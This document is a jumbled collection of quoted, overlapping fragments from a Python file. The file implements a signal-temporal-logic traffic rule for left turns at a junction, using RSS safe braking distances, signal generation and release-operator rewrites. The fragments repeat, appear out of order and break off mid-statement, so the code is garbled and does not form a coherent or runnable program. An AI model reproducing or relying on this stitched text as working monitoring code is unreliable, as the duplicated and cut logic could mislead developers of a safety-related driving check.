"out_signals = {k: list(v) for k, v in out_signals.items()} # check output assert", "out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"]", "STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic Rule for two cars", "case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e", "other road.>> Intuition behind formalization: premise = \"ego is approaching but not occupying", "out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals", "spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\"", "intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego,", "impede a road user who has the right of way when the latter", "dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego)", "`d_f_brake` term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 /", "V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check", "/ self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] =", "release_condition is true (the ego can cross) If only-pos, when car crosses junction,", "= data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] =", "= data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] 
out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_e\") out_signals[\"d_lon_min_cj\"]", "pos-neg) If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true", "** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff", "true (the ego can cross) If only-pos, when car crosses junction, d(car,j)=inf, then", "\"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters for", "when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time in", "and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake =", "np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule implement the Traffic", "road user who is obliged to give way substantially impede a road user", "min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in", "f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn", "output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0]", "not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp =", "return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake", "can cross) If only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition", "turns into the other road.>> Intuition behind formalization: premise = \"ego is approaching", "@property def demo_spec(self): # predicates E_canbrake = 
\"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj", "# resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp", "d_b_brake_num / d_b_brake_den d_diff = d_b_prebr + d_b_brake d_lon_min = np.maximum(d_diff, np.zeros_like(d_diff)) return", "must a road user who is obliged to give way substantially impede a", "\"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\",", "# resulting specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next", "-> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\",", "occupying the junction j, other car has no time to brake\" proper response", "use `next` operator, we need discrete-time stl) `max_steps`: overestimation of the episode length,", "the other road.>> Intuition behind formalization: premise = \"ego is approaching but not", "rss_params for p in required_parameters]) self._p = {p: rss_params[p] for p in required_parameters}", "until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting specification phi_lt_resp", "specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self,", "= phi_1 R_I (phi_1 or phi_2) \"\"\" @property def variables(self): return [\"time\", \"d_lon_ej\",", "not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake", "signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] -", "need discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor open", "the junction j, other car has no time to 
brake\" proper response =", "or other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND", "list(v) for k, v in out_signals.items()} # check output assert all([s in out_signals", "specification # note: non-strict release operator is written using not and until S", "AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j)", "other car has no time to brake\" proper response = \"ego brakes until", "intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in", "0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into", "brakes until reach zero-velocity or other car crossed the intersection\" Formalization in STL:", "\"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\"", "= data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\")", "# check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert", "acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction time", "{p: rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake =", "required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for", "np.ndarray: # note: the only change is the assumption that v_front = 0,", "user who has the right of way. [...] 
Nor must a road user", "parameters for rss monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking", "= [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\", \"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p", "assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals} not", "/ 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho']", "out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] = data[\"d_lon_cj\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_junc\"] out_signals[\"d_lon_min_ej\"]", "return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: #", "data[\"elapsed_time\"][0]) / self._p[\"sim_dt\"]).astype(int) out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"]", "j) <= 0) OR (car_can_brake) Note: this condition takes into account 2 possible", "longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal acceleration `rho`: reaction", "plan_react = (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <=", "until reach zero-velocity or other car crossed the intersection\" Formalization in STL: premise", "= 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff = d_b_prebr +", "= data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] **", "E_not_injunc = \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake}", "in signals ({obs_signals} not in {data.keys()})\" # generate output signals from input signals", "If pos-neg, when car crosses junction, d(car,j)<0 and then release_condition is true (the", "or 
{C_react_or_crossed})\" # specification # note: non-strict release operator is written using not", "= \"(is_e_in_junc <= 0)\" V_lon_e_stop = \"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or", "in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def generate_signals(self,", "Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\",", ": min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, max longitudinal", "release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def.", "only-pos, when car crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*:", "f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg", "rss_params[p] for p in required_parameters} @property def spec(self): # predicates E_canbrake = \"(d_lon_ej", "not occupying the junction j, other car has no time to brake\" proper", "the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2 * self._p['a_lon_maxacc']", "Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note: the only change is the", "Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\" @property def", "= \"ego is approaching but not occupying the junction j, other car has", "term from the calculation d_b_prebr = data[v_field] * self._p['rho'] + 1 / 2", "-> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake = \"(d_lon_ej", "((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) ** 2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake", "k, v in out_signals.items()} # check output assert all([s in out_signals for s", "<= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in", "specification phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" 
return", "stationary # then, we just remove the `d_f_brake` term from the calculation d_b_prebr", "to match the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1", "+ 1 / 2 * self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field]", "to give way substantially impede a road user who has the right of", "time in seconds `rho_dt`: reaction time in number of steps (note: we use", "seconds `rho_dt`: reaction time in number of steps (note: we use `next` operator,", "(({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self):", "the assumption that v_front = 0, because a junction is stationary # then,", "of way when the latter turns into the other road.>> Intuition behind formalization:", "0, because a junction is stationary # then, we just remove the `d_f_brake`", "\"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <= 0)\"", "longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number of", "R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition =", "d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake plan_react =", "check output assert all([s in out_signals for s in self.variables]), f\"missing out signals", "input signals out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] =", "out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals =", "then, we just remove the `d_f_brake` term from the calculation d_b_prebr = data[v_field]", "= (ego_can_brake AND NOT(next(ego_can_brake))) AND 
(car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) >", "reaction time in seconds `rho_dt`: reaction time in number of steps (note: we", "out_signals = {} out_signals[\"time\"] = data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"]", "import numpy as np from stl_rules.stl_rule import STLRule class TrafficRuleLeftTurn(STLRule): \"\"\" This rule", "(d_lon_cj<0))\" # the check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc", "a road user who has the right of way. [...] Nor must a", "{k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s in", "self._p['a_lon_maxacc'] * self._p['rho'] ** 2 d_b_brake_num = ((data[v_field] + self._p['rho'] * self._p['a_lon_maxacc']) **", "\"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\",", "until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake})) and ({E_not_injunc}))\" P_react = f\"(not(not({release_cond})", "cars approaching a junction in opposite directions: <<[...] They may only proceed if", "= f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_minbr})))\" P_leftturn = f\"({P_react} and {P_brake})\" # resulting", "acceleration `rho`: reaction time in seconds `rho_dt`: reaction time in number of steps", "out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\")", "\"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in", "who has the right of way. [...] 
Nor must a road user who", "the Traffic Rule for two cars approaching a junction in opposite directions: <<[...]", "Note: this condition takes into account 2 possible implementation of the distance metric", "- Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2)", "formalization: premise = \"ego is approaching but not occupying the junction j, other", "np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\",", "\"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"]", "`rho_dt`: reaction time in number of steps (note: we use `next` operator, we", "for s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" # generate", "\"a_lon_e\", \"v_lon_e\", \"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in", "{S})) -> (next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str)", "= {k: list(v[begin:end]) for k, v in out_signals.items()} # check output assert all([s", "in case d has pos-neg interpret. 
A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr =", "= (release_condition) R^ns_{0:rho} (a_lon(ego) <= a_lon_maxacc) plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr)", "junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have been", "2) d_b_brake_den = 2 * self._p['a_lon_minbr'] d_b_brake = d_b_brake_num / d_b_brake_den d_diff =", "s in self.variables]), f\"missing out signals ({self.variables} not in {out_signals.keys()})\" return out_signals def", "crosses junction, d(car,j)=inf, then car_can_brake and release_condition is true *Rewriting*: some operators have", "data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"]", "{data.keys()})\" # generate output signals from input signals out_signals = {} out_signals[\"time\"] =", "\"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]),", "Dict[str, np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\",", "only change is the assumption that v_front = 0, because a junction is", "R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car, j) <=", "the rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2", "\"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing in signals ({obs_signals}", "<= 0) OR (dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes", "nor substantially impede a road user who has the right of way. 
[...]", "f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification # note: non-strict release operator is written using", "out_signals[\"a_lon_e\"] = data[\"a_lon_ego\"] out_signals[\"v_lon_e\"] = data[\"v_lon_ego\"] out_signals[\"d_lon_ej\"] = data[\"d_ego_j\"] out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"]", "and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): #", "A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\" # specification #", "a road user who has the right of way when the latter turns", "then car_can_brake and release_condition is true *Rewriting*: some operators have been rewritten to", "is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake}))) and (not({C_canbrake}))", "= data[\"time\"] out_signals[\"a_lon_e\"] = data[\"a_lon_e\"] out_signals[\"v_lon_e\"] = data[\"v_lon_e\"] out_signals[\"d_lon_ej\"] = data[\"d_lon_ej\"] out_signals[\"d_lon_cj\"] =", "def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self,", "= \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc <=", "assert all([p in rss_params for p in required_parameters]) self._p = {p: rss_params[p] for", "[\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s", "not(phi_2)) - Def. 
Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or", "for k, v in out_signals.items()} # check output assert all([s in out_signals for", "np.zeros_like(d_diff)) return d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]:", "we need discrete-time stl) `max_steps`: overestimation of the episode length, used to monitor", "not in {out_signals.keys()})\" return out_signals def generate_signals(self, data: Dict[str, np.ndarray]) -> Dict[str, List]:", "car crossed the intersection\" Formalization in STL: premise = (ego_can_brake AND NOT(next(ego_can_brake))) AND", "@property def variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property", "= self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_c\") out_signals = {k: list(v) for k, v in out_signals.items()} #", "np.ndarray]) -> Dict[str, List]: # check input obs_signals = [\"time\", \"a_lon_e\", \"v_lon_e\", \"v_lon_c\",", "0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj in case", "(not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp @property def demo_spec(self): # predicates E_canbrake", "plan_brake = (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR", "monitoring `a_lon_minbr`, `a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` :", "\"rho_dt\", \"sim_dt\", \"max_steps\"] assert all([p in rss_params for p in required_parameters]) self._p =", "List]: # check input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"]", "{P_brake})\" # resulting specification phi_lt_resp = f\"(next (not {S})) -> (next {P_leftturn})\" return", "`a_lon_maxbr` : min, max longitudinal acceleration when breaking `a_lon_minacc`, `a_lon_maxacc` : min, 
max", "rtamt spec language (e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 =", "(next {P_leftturn})\" return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray:", "\"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in data for s in obs_signals]), f\"missing", "variables(self): return [\"time\", \"d_lon_ej\", \"d_lon_cj\", \"d_lon_min_ej\", \"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self):", "d(car,j)<0 and then release_condition is true (the ego can cross) If only-pos, when", "episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\", \"rho\",", "d_lon_min def generate_signals_for_demo(self, data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check", "user who has the right of way when the latter turns into the", "\"(v_lon_e <= 0)\" C_react_or_crossed = f\"({C_canbrake} or (d_lon_cj<0))\" # the check on d_lon_cj", "phi_lt_resp = f\"always (({S} and (next (not {S}))) -> (next {P_leftturn}))\" return phi_lt_resp", "# predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc", "of way. [...] Nor must a road user who is obliged to give", "operator, we need discrete-time stl) `max_steps`: overestimation of the episode length, used to", "(ego_can_brake AND NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j)", "directions: <<[...] 
They may only proceed if they can see that they will", "output assert all([s in out_signals for s in self.variables]), f\"missing out signals ({self.variables}", "out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"] - data[\"elapsed_time\"][0] out_signals[\"time\"] = np.floor((data[\"elapsed_time\"] - data[\"elapsed_time\"][0])", "zero-velocity or other car crossed the intersection\" Formalization in STL: premise = (ego_can_brake", "the latter turns into the other road.>> Intuition behind formalization: premise = \"ego", "release operator is written using not and until S = f\"(({E_canbrake} and not(next({E_canbrake})))", "ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react", "NOT(next(ego_can_brake))) AND (car_can_brake) AND (is_in_junction(ego, j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake =", "from typing import Dict, List import numpy as np from stl_rules.stl_rule import STLRule", "input obs_signals = [\"elapsed_time\", \"v_lon_ego\", \"v_lon_car\", \"a_lon_ego\", \"d_ego_j\", \"is_e_in_j\", \"d_car_j\"] assert all([s in", "\"d_lon_min_cj\", \"is_e_in_junc\", \"v_lon_e\", \"a_lon_e\"] @property def types(self): return [\"int\", \"float\", \"float\", \"float\", \"float\",", "data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_car\") out_signals", "phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. 
Non-Strict Release: phi_1 R^ns_I phi_2 =", "= (release_condition) R^ns_{rho:inf} (a_lon(ego) <= -a_lon_minbr) release_condition = (v_lon(ego) <= 0) OR (dist(car,", "predicates E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc =", "dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan = plan_react AND plan_brake", "in number of steps (note: we use `next` operator, we need discrete-time stl)", "(e.g. non-strict release) - Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2))", "check on d_lon_cj in case d has pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <=", "f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond = f\"({V_lon_e_stop} or {C_react_or_crossed})\"", "\"v_lon_c\", \"d_lon_ej\", \"d_lon_cj\", \"is_e_in_junc\"] assert all([s in data for s in obs_signals]), f\"missing", "(dist(car, j) <= 0) OR (car_can_brake) Note: this condition takes into account 2", "number of steps (note: we use `next` operator, we need discrete-time stl) `max_steps`:", "impede a road user who has the right of way. [...] Nor must", "pos-neg interpret. A_lon_e_maxacc = f\"(a_lon_e <= {self._p['a_lon_maxacc']})\" A_lon_e_minbr = f\"(a_lon_e <= -{self._p['a_lon_minbr']})\" release_cond", "E_canbrake = \"(d_lon_ej > d_lon_min_ej)\" C_canbrake = \"(d_lon_cj > d_lon_min_cj)\" E_not_injunc = \"(is_e_in_junc", "# generate output signals from input signals out_signals = {} out_signals[\"elapsed_time\"] = data[\"elapsed_time\"]", "= {k: list(v) for k, v in out_signals.items()} # check output assert all([s", "operators have been rewritten to match the rtamt spec language (e.g. non-strict release)", "approaching a junction in opposite directions: <<[...] 
They may only proceed if they", "j)<=0) ego_can_brake = dist(ego,j) > d_lon_safe(ego,j) car_can_brake = dist(car,j) > d_lon_safe(car,j) plan =", "\"\"\" This rule implement the Traffic Rule for two cars approaching a junction", "Def. Non-Strict Release: phi_1 R^ns_I phi_2 = phi_1 R_I (phi_1 or phi_2) \"\"\"", "out_signals[\"d_lon_cj\"] = data[\"d_car_j\"] out_signals[\"is_e_in_junc\"] = data[\"is_e_in_j\"] out_signals[\"d_lon_min_ej\"] = self._compute_dynamic_safe_long_dist_to_junction(data, v_field=\"v_lon_ego\") out_signals[\"d_lon_min_cj\"] = self._compute_dynamic_safe_long_dist_to_junction(data,", "data: Dict[str, np.ndarray], begin:int=5, end:int=1000) -> Dict[str, List]: # check input obs_signals =", "phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release: phi_1 R^ns_I", "v_field: str) -> np.ndarray: # note: the only change is the assumption that", "data for s in obs_signals]), f\"missing in signals ({obs_signals} not in {data.keys()})\" #", "Def. Release: phi_1 R_I phi_2 = not(not(phi_1) Until_i not(phi_2)) - Def. Non-Strict Release:", "return phi_lt_resp def _compute_dynamic_safe_long_dist_to_junction(self, data: Dict[str, np.ndarray], v_field: str) -> np.ndarray: # note:", "change is the assumption that v_front = 0, because a junction is stationary", "car has no time to brake\" proper response = \"ego brakes until reach", "\"float\", \"float\", \"float\", \"float\", \"float\"] def __init__(self, rss_params): \"\"\" :param rss_params: static parameters", "the episode length, used to monitor open intervals \"\"\" required_parameters = [\"a_lon_minbr\", \"a_lon_maxacc\",", "P_react = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or {A_lon_e_maxacc})))\" P_brake = f\"(not(not({release_cond}) until[0:{self._p['rho_dt']}] not({release_cond} or", ": min, max longitudinal acceleration `rho`: reaction time in seconds `rho_dt`: reaction time", "rewritten to match the rtamt spec language (e.g. 
